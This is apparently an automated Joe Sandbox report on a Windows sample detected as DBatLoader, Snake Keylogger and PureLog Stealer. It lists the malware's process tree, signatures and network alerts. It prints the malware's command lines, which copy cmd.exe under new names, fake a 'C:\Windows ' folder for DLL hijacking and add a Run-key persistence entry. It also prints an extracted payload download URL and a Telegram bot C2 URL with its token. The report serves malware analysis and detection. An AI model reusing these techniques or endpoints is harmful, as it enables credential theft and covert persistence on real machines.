Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EPTMAcgvNZ.exe

Overview

General Information

Sample name:EPTMAcgvNZ.exe
renamed because original name is a hash value
Original sample name:059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5.exe
Analysis ID:1562871
MD5:dc614075998696b44ada8a2eed23fc03
SHA1:911b29ff40b13f6935568153f178867e10946311
SHA256:059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EPTMAcgvNZ.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\EPTMAcgvNZ.exe" MD5: DC614075998696B44ADA8A2EED23FC03)
    • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 1768 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 7284 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 7400 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7456 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7496 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 7512 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 7972 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 8044 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 8064 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7184 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • yihfsboC.pif (PID: 7240 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cobsfhiy.PIF (PID: 7568 cmdline: "C:\Users\Public\Libraries\Cobsfhiy.PIF" MD5: DC614075998696B44ADA8A2EED23FC03)
    • yihfsboC.pif (PID: 7660 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cobsfhiy.PIF (PID: 7808 cmdline: "C:\Users\Public\Libraries\Cobsfhiy.PIF" MD5: DC614075998696B44ADA8A2EED23FC03)
    • yihfsboC.pif (PID: 7924 cmdline: C:\Users\Public\Libraries\yihfsboC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx"]}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x28a15:$a1: get_encryptedPassword
      • 0x289e9:$a2: get_encryptedUsername
      • 0x28aad:$a3: get_timePasswordChanged
      • 0x289c5:$a4: get_passwordField
      • 0x28a2b:$a5: set_encryptedPassword
      • 0x287f8:$a7: get_logins
      • 0x24f36:$a10: KeyLoggerEventArgs
      • 0x24f05:$a11: KeyLoggerEventArgsEventHandler
      • 0x288cc:$a13: _encryptedPassword
      00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
      • 0x2725d:$s1: UnHook
      • 0x271f9:$s2: SetHook
      • 0x27232:$s3: CallNextHook
      • 0x271c1:$s4: _hook
      00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 90 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.2.yihfsboC.pif.400000.5.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        26.2.yihfsboC.pif.2b4c0000.10.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          26.2.yihfsboC.pif.2b4c0000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            26.2.yihfsboC.pif.2b4c0000.10.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x28a15:$a1: get_encryptedPassword
            • 0x289e9:$a2: get_encryptedUsername
            • 0x28aad:$a3: get_timePasswordChanged
            • 0x289c5:$a4: get_passwordField
            • 0x28a2b:$a5: set_encryptedPassword
            • 0x287f8:$a7: get_logins
            • 0x24f36:$a10: KeyLoggerEventArgs
            • 0x24f05:$a11: KeyLoggerEventArgsEventHandler
            • 0x288cc:$a13: _encryptedPassword
            26.2.yihfsboC.pif.2b4c0000.10.raw.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2725d:$s1: UnHook
            • 0x271f9:$s2: SetHook
            • 0x27232:$s3: CallNextHook
            • 0x271c1:$s4: _hook
            Click to see the 199 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
            Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yihfsboC.pif, NewProcessName: C:\Users\Public\Libraries\yihfsboC.pif, OriginalFileName: C:\Users\Public\Libraries\yihfsboC.pif, ParentCommandLine: "C:\Users\user\Desktop\EPTMAcgvNZ.exe", ParentImage: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ParentProcessId: 7128, ParentProcessName: EPTMAcgvNZ.exe, ProcessCommandLine: C:\Users\Public\Libraries\yihfsboC.pif, ProcessId: 7240, ProcessName: yihfsboC.pif
            Sigma detected: New RUN Key Pointing to Suspicious Folder
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cobsfhiy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cobsfhiy
            Sigma detected: Suspicious Program Location with Network Connections
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\yihfsboC.pif, Initiated: true, ProcessId: 7240, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cobsfhiy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cobsfhiy
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine: C:\Users\Public\Libraries\yihfsboC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yihfsboC.pif, NewProcessName: C:\Users\Public\Libraries\yihfsboC.pif, OriginalFileName: C:\Users\Public\Libraries\yihfsboC.pif, ParentCommandLine: "C:\Users\user\Desktop\EPTMAcgvNZ.exe", ParentImage: C:\Users\user\Desktop\EPTMAcgvNZ.exe, ParentProcessId: 7128, ParentProcessName: EPTMAcgvNZ.exe, ProcessCommandLine: C:\Users\Public\Libraries\yihfsboC.pif, ProcessId: 7240, ProcessName: yihfsboC.pif

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-26T08:24:42.922117+010020283713Unknown Traffic192.168.2.749702185.166.143.48443TCP
            2024-11-26T08:24:45.662912+010020283713Unknown Traffic192.168.2.74970316.182.70.225443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-26T08:25:08.912759+010028530061A Network Trojan was detected192.168.2.749742149.154.167.220443TCP
            2024-11-26T08:25:19.825821+010028530061A Network Trojan was detected192.168.2.749764149.154.167.220443TCP
            2024-11-26T08:25:21.178091+010028530061A Network Trojan was detected192.168.2.749770149.154.167.220443TCP
            2024-11-26T08:25:23.204892+010028530061A Network Trojan was detected192.168.2.749775149.154.167.220443TCP
            2024-11-26T08:25:23.946619+010028530061A Network Trojan was detected192.168.2.749776149.154.167.220443TCP
            2024-11-26T08:25:26.049970+010028530061A Network Trojan was detected192.168.2.749781149.154.167.220443TCP
            2024-11-26T08:25:28.010639+010028530061A Network Trojan was detected192.168.2.749786149.154.167.220443TCP
            2024-11-26T08:25:32.576254+010028530061A Network Trojan was detected192.168.2.749791149.154.167.220443TCP
            2024-11-26T08:25:32.586543+010028530061A Network Trojan was detected192.168.2.749793149.154.167.220443TCP
            2024-11-26T08:25:34.569182+010028530061A Network Trojan was detected192.168.2.749803149.154.167.220443TCP
            2024-11-26T08:25:34.654030+010028530061A Network Trojan was detected192.168.2.749802149.154.167.220443TCP
            2024-11-26T08:25:35.355516+010028530061A Network Trojan was detected192.168.2.749806149.154.167.220443TCP
            2024-11-26T08:25:36.477132+010028530061A Network Trojan was detected192.168.2.749810149.154.167.220443TCP
            2024-11-26T08:25:36.566754+010028530061A Network Trojan was detected192.168.2.749811149.154.167.220443TCP
            2024-11-26T08:25:37.286947+010028530061A Network Trojan was detected192.168.2.749813149.154.167.220443TCP
            2024-11-26T08:25:38.453268+010028530061A Network Trojan was detected192.168.2.749817149.154.167.220443TCP
            2024-11-26T08:25:38.596417+010028530061A Network Trojan was detected192.168.2.749818149.154.167.220443TCP
            2024-11-26T08:25:39.254460+010028530061A Network Trojan was detected192.168.2.749821149.154.167.220443TCP
            2024-11-26T08:25:40.506102+010028530061A Network Trojan was detected192.168.2.749823149.154.167.220443TCP
            2024-11-26T08:25:40.690385+010028530061A Network Trojan was detected192.168.2.749825149.154.167.220443TCP
            2024-11-26T08:25:41.309105+010028530061A Network Trojan was detected192.168.2.749828149.154.167.220443TCP
            2024-11-26T08:25:42.559961+010028530061A Network Trojan was detected192.168.2.749831149.154.167.220443TCP
            2024-11-26T08:25:42.660893+010028530061A Network Trojan was detected192.168.2.749832149.154.167.220443TCP
            2024-11-26T08:25:43.283332+010028530061A Network Trojan was detected192.168.2.749836149.154.167.220443TCP
            2024-11-26T08:25:44.896641+010028530061A Network Trojan was detected192.168.2.749840149.154.167.220443TCP
            2024-11-26T08:25:44.936818+010028530061A Network Trojan was detected192.168.2.749839149.154.167.220443TCP
            2024-11-26T08:25:46.081878+010028530061A Network Trojan was detected192.168.2.749842149.154.167.220443TCP
            2024-11-26T08:25:46.878546+010028530061A Network Trojan was detected192.168.2.749846149.154.167.220443TCP
            2024-11-26T08:25:46.926538+010028530061A Network Trojan was detected192.168.2.749847149.154.167.220443TCP
            2024-11-26T08:25:48.241922+010028530061A Network Trojan was detected192.168.2.749850149.154.167.220443TCP
            2024-11-26T08:25:49.140464+010028530061A Network Trojan was detected192.168.2.749854149.154.167.220443TCP
            2024-11-26T08:25:49.173504+010028530061A Network Trojan was detected192.168.2.749855149.154.167.220443TCP
            2024-11-26T08:25:50.267456+010028530061A Network Trojan was detected192.168.2.749858149.154.167.220443TCP
            2024-11-26T08:25:51.080992+010028530061A Network Trojan was detected192.168.2.749864149.154.167.220443TCP
            2024-11-26T08:25:51.119037+010028530061A Network Trojan was detected192.168.2.749863149.154.167.220443TCP
            2024-11-26T08:25:52.281538+010028530061A Network Trojan was detected192.168.2.749867149.154.167.220443TCP
            2024-11-26T08:25:53.054025+010028530061A Network Trojan was detected192.168.2.749868149.154.167.220443TCP
            2024-11-26T08:25:53.204327+010028530061A Network Trojan was detected192.168.2.749870149.154.167.220443TCP
            2024-11-26T08:25:54.375472+010028530061A Network Trojan was detected192.168.2.749876149.154.167.220443TCP
            2024-11-26T08:25:55.122672+010028530061A Network Trojan was detected192.168.2.749878149.154.167.220443TCP
            2024-11-26T08:25:55.229963+010028530061A Network Trojan was detected192.168.2.749877149.154.167.220443TCP
            2024-11-26T08:25:59.252785+010028530061A Network Trojan was detected192.168.2.749884149.154.167.220443TCP
            2024-11-26T08:25:59.286116+010028530061A Network Trojan was detected192.168.2.749887149.154.167.220443TCP
            2024-11-26T08:25:59.310128+010028530061A Network Trojan was detected192.168.2.749886149.154.167.220443TCP
            2024-11-26T08:26:01.252796+010028530061A Network Trojan was detected192.168.2.749898149.154.167.220443TCP
            2024-11-26T08:26:01.277971+010028530061A Network Trojan was detected192.168.2.749897149.154.167.220443TCP
            2024-11-26T08:26:01.291141+010028530061A Network Trojan was detected192.168.2.749899149.154.167.220443TCP
            2024-11-26T08:26:03.351666+010028530061A Network Trojan was detected192.168.2.749904149.154.167.220443TCP
            2024-11-26T08:26:03.370309+010028530061A Network Trojan was detected192.168.2.749905149.154.167.220443TCP
            2024-11-26T08:26:03.406589+010028530061A Network Trojan was detected192.168.2.749906149.154.167.220443TCP
            2024-11-26T08:26:05.312972+010028530061A Network Trojan was detected192.168.2.749914149.154.167.220443TCP
            2024-11-26T08:26:05.352639+010028530061A Network Trojan was detected192.168.2.749913149.154.167.220443TCP
            2024-11-26T08:26:05.393524+010028530061A Network Trojan was detected192.168.2.749912149.154.167.220443TCP
            2024-11-26T08:26:07.279485+010028530061A Network Trojan was detected192.168.2.749920149.154.167.220443TCP
            2024-11-26T08:26:07.345296+010028530061A Network Trojan was detected192.168.2.749921149.154.167.220443TCP
            2024-11-26T08:26:07.457694+010028530061A Network Trojan was detected192.168.2.749922149.154.167.220443TCP
            2024-11-26T08:26:09.366044+010028530061A Network Trojan was detected192.168.2.749927149.154.167.220443TCP
            2024-11-26T08:26:09.446698+010028530061A Network Trojan was detected192.168.2.749930149.154.167.220443TCP
            2024-11-26T08:26:09.474202+010028530061A Network Trojan was detected192.168.2.749928149.154.167.220443TCP
            2024-11-26T08:26:11.332919+010028530061A Network Trojan was detected192.168.2.749933149.154.167.220443TCP
            2024-11-26T08:26:11.428641+010028530061A Network Trojan was detected192.168.2.749935149.154.167.220443TCP
            2024-11-26T08:26:11.471048+010028530061A Network Trojan was detected192.168.2.749936149.154.167.220443TCP
            2024-11-26T08:26:13.256007+010028530061A Network Trojan was detected192.168.2.749941149.154.167.220443TCP
            2024-11-26T08:26:13.436690+010028530061A Network Trojan was detected192.168.2.749942149.154.167.220443TCP
            2024-11-26T08:26:13.501238+010028530061A Network Trojan was detected192.168.2.749943149.154.167.220443TCP
            2024-11-26T08:26:15.278867+010028530061A Network Trojan was detected192.168.2.749948149.154.167.220443TCP
            2024-11-26T08:26:15.348597+010028530061A Network Trojan was detected192.168.2.749949149.154.167.220443TCP
            2024-11-26T08:26:15.422819+010028530061A Network Trojan was detected192.168.2.749950149.154.167.220443TCP
            2024-11-26T08:26:17.209949+010028530061A Network Trojan was detected192.168.2.749954149.154.167.220443TCP
            2024-11-26T08:26:17.284332+010028530061A Network Trojan was detected192.168.2.749956149.154.167.220443TCP
            2024-11-26T08:26:17.536036+010028530061A Network Trojan was detected192.168.2.749958149.154.167.220443TCP
            2024-11-26T08:26:19.184103+010028530061A Network Trojan was detected192.168.2.749962149.154.167.220443TCP
            2024-11-26T08:26:19.312608+010028530061A Network Trojan was detected192.168.2.749963149.154.167.220443TCP
            2024-11-26T08:26:19.522199+010028530061A Network Trojan was detected192.168.2.749964149.154.167.220443TCP
            2024-11-26T08:26:21.092837+010028530061A Network Trojan was detected192.168.2.749970149.154.167.220443TCP
            2024-11-26T08:26:21.241718+010028530061A Network Trojan was detected192.168.2.749971149.154.167.220443TCP
            2024-11-26T08:26:21.592855+010028530061A Network Trojan was detected192.168.2.749972149.154.167.220443TCP
            2024-11-26T08:26:23.080079+010028530061A Network Trojan was detected192.168.2.749978149.154.167.220443TCP
            2024-11-26T08:26:23.222050+010028530061A Network Trojan was detected192.168.2.749979149.154.167.220443TCP
            2024-11-26T08:26:23.535147+010028530061A Network Trojan was detected192.168.2.749980149.154.167.220443TCP
            2024-11-26T08:26:25.245719+010028530061A Network Trojan was detected192.168.2.749985149.154.167.220443TCP
            2024-11-26T08:26:25.283026+010028530061A Network Trojan was detected192.168.2.749987149.154.167.220443TCP
            2024-11-26T08:26:25.589458+010028530061A Network Trojan was detected192.168.2.749988149.154.167.220443TCP
            2024-11-26T08:26:31.642373+010028530061A Network Trojan was detected192.168.2.749995149.154.167.220443TCP
            2024-11-26T08:26:31.656599+010028530061A Network Trojan was detected192.168.2.749994149.154.167.220443TCP
            2024-11-26T08:26:31.693328+010028530061A Network Trojan was detected192.168.2.749996149.154.167.220443TCP
            2024-11-26T08:26:33.574221+010028530061A Network Trojan was detected192.168.2.750009149.154.167.220443TCP
            2024-11-26T08:26:33.643595+010028530061A Network Trojan was detected192.168.2.750010149.154.167.220443TCP
            2024-11-26T08:26:33.752791+010028530061A Network Trojan was detected192.168.2.750011149.154.167.220443TCP
            2024-11-26T08:26:35.569075+010028530061A Network Trojan was detected192.168.2.750017149.154.167.220443TCP
            2024-11-26T08:26:35.681487+010028530061A Network Trojan was detected192.168.2.750018149.154.167.220443TCP
            2024-11-26T08:26:35.733782+010028530061A Network Trojan was detected192.168.2.750019149.154.167.220443TCP
            2024-11-26T08:26:37.715979+010028530061A Network Trojan was detected192.168.2.750023149.154.167.220443TCP
            2024-11-26T08:26:37.794071+010028530061A Network Trojan was detected192.168.2.750027149.154.167.220443TCP
            2024-11-26T08:26:37.818520+010028530061A Network Trojan was detected192.168.2.750025149.154.167.220443TCP
            2024-11-26T08:26:39.757265+010028530061A Network Trojan was detected192.168.2.750031149.154.167.220443TCP
            2024-11-26T08:26:39.795861+010028530061A Network Trojan was detected192.168.2.750033149.154.167.220443TCP
            2024-11-26T08:26:39.916899+010028530061A Network Trojan was detected192.168.2.750032149.154.167.220443TCP
            2024-11-26T08:26:41.912089+010028530061A Network Trojan was detected192.168.2.750040149.154.167.220443TCP
            2024-11-26T08:26:41.912183+010028530061A Network Trojan was detected192.168.2.750039149.154.167.220443TCP
            2024-11-26T08:26:41.929941+010028530061A Network Trojan was detected192.168.2.750041149.154.167.220443TCP
            2024-11-26T08:26:44.076440+010028530061A Network Trojan was detected192.168.2.750047149.154.167.220443TCP
            2024-11-26T08:26:44.094887+010028530061A Network Trojan was detected192.168.2.750049149.154.167.220443TCP
            2024-11-26T08:26:44.123470+010028530061A Network Trojan was detected192.168.2.750048149.154.167.220443TCP
            2024-11-26T08:26:46.030364+010028530061A Network Trojan was detected192.168.2.750057149.154.167.220443TCP
            2024-11-26T08:26:46.066302+010028530061A Network Trojan was detected192.168.2.750055149.154.167.220443TCP
            2024-11-26T08:26:46.115026+010028530061A Network Trojan was detected192.168.2.750056149.154.167.220443TCP
            2024-11-26T08:26:51.465312+010028530061A Network Trojan was detected192.168.2.750070149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: EPTMAcgvNZ.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFAvira: detection malicious, Label: TR/AD.Nekark.pgnqj
            Found malware configuration
            Source: EPTMAcgvNZ.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx"]}
            Source: yihfsboC.pif.7240.14.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFReversingLabs: Detection: 63%
            Multi AV Scanner detection for submitted file
            Source: EPTMAcgvNZ.exeReversingLabs: Detection: 63%
            Source: EPTMAcgvNZ.exeVirustotal: Detection: 71%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: EPTMAcgvNZ.exeJoe Sandbox ML: detected

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 14.2.yihfsboC.pif.400000.5.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 23.2.yihfsboC.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\yihfsboC.pifUnpacked PE file: 26.2.yihfsboC.pif.400000.0.unpack
            Source: EPTMAcgvNZ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 16.182.70.225:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49972 version: TLS 1.2
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
